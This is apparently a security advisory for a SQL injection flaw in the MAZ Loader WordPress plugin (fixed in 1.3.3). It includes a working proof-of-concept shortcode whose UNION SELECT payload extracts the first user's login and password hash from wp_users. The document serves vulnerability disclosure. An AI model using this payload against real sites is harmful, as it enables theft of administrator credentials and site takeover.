MAZ Loader < 1.3.3 - Contributor+ SQL Injection
Description
The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.
Proof of Concept
As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).
[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('Iiwic2l6ZSI6MTAwLCJiYWNrZ3JvdW5kIjoiIiwiY29sb3IiOiIiLCJwYWRkaW5nX3RvcCI6MCwicGFkZGluZ19yaWdodCI6MCwicGFkZGluZ19ib3R0b20iOjAsInBhZGRpbmdfbGVmdCI6MCwicGFkZGluZ19saW5rIjoiYWxsIiwicGFkZGluZ190eXBlIjoicHgiLCJtYXJnaW5fdG9wIjowLCJtYXJnaW5fcmlnaHQiOjAsIm1hcmdpbl9ib3R0b20iOjAsIm1hcmdpbl9sZWZ0IjowLCJtYXJnaW5fbGluayI6ImFsbCIsIm1hcmdpbl90eXBlIjoicHgifX0sInNldHRpbmdzIjp7Im1pbmltdW1fbG9hZGluZ190aW1lIjoyMDAwLCJkdXJhdGlvbiI6MTAwMCwiZGVsYXkiOjAsInNob3dfb25faG9tZXBhZ2UiOiJvZmYifSwiYXBwZWFyYW5jZSI6eyJiYWNrZ3JvdW5kX2NvbG9yIjoiI2RkOTkzMyIsImJhY2tncm91bmQiOiIiLCJiYWNrZ3JvdW5kX2ltYWdlX3R5cGUiOiJjb3ZlciIsImJhY2tncm91bmRfaW1hZ2VfcG9zaXRpb24iOiJjZW50ZXJfY2VudGVyIiwiYmFja2dyb3VuZF9jb2xvcl9vdmVybGF5IjoiIiwiY29udGVudF9wb3NpdGlvbiI6ImNlbnRlciIsIml0ZW1zX3NpZGVfYnlfc2lkZSI6Im9mZiIsImRpc2FibGVfcGFnZV9zY3JvbGwiOiJvbiJ9LCJjdXN0b21fY29kZSI6IiIsInB1Ymxpc2hfc2V0dGluZ3MiOiIifQ==')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"] Affects Plugins
Fixed in version 1.3.3✓
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-10-11 (about 3 months ago)
Added
2021-10-11 (about 3 months ago)
Last Updated
2021-10-11 (about 3 months ago)